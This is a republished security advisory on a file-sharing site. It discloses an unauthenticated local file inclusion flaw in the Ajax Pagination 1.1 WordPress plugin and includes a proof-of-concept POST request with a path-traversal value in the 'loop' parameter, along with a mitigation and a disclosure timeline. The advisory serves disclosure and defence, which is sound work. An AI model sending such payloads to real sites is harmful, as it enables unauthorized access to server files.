exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Ajax Pagination 1.1 Local File Inclusion

Ajax Pagination 1.1 Local File Inclusion
Posted Mar 28, 2014
Authored by Glyn Wintle

Ajax Pagination version 1.1 suffers from a local file inclusion vulnerability.

tags | exploit, local, file inclusion
SHA-256 | 69e08cc5d2ea4848004a83b725d70d5539504575928edebeba5a13590e8b2878

Ajax Pagination 1.1 Local File Inclusion

Change Mirror Download
Details
================
Software: Ajax Pagination (twitter Style)
Version: 1.1
Homepage: http://wordpress.org/plugins/ajax-pagination/
CVSS: 9.3 (High; AV:N/AC:M/Au:N/C:C/I:C/A:C)

Description
================
End-user exploitable local file inclusion vulnerability in Ajax
Pagination (twitter Style) 1.1

Vulnerability
================
This plugin contains a file inclusion vulnerability that is exploitable
by an unauthenticated user. The user can include any local file ending
in “.php” which is accessible to the web user.

Proof of concept
================
A non-logged in user can call the ajax function
wp_ajax_nopriv_ajax_navigation that calls ajax_navigation_callback in
ajax-pagination-front.php at line 75.
By setting the value of “loop” in the POST data, they can include the
contents of that path on the returned page.
For example, to include the contents of wp-login.php in the returned
page, send the following:
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 53
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
paged=2&action=ajax_navigation&loop=../../../wp-login


Mitigations
================
Disable the plugin until a fix is available.

Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our
disclosure policy: https://security.dxw.com/disclosure/

Please contact us on security@dxw.com to acknowledge this report if you
received it via a third party (for example, plugins@wordpress.org) as
they generally cannot communicate with us on your behalf.

Please note that this vulnerability will be published if we do not
receive a response to this report with 14 days.

Timeline
================

2014-02-18: Reported to nuwan28@gmail.com and plugins@wordpress.org
2014-03-28: No response received to reports. Vulnerability published.


Discovered by dxw:
================
Glyn Wintle
Please visit security.dxw.com for more information.



Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close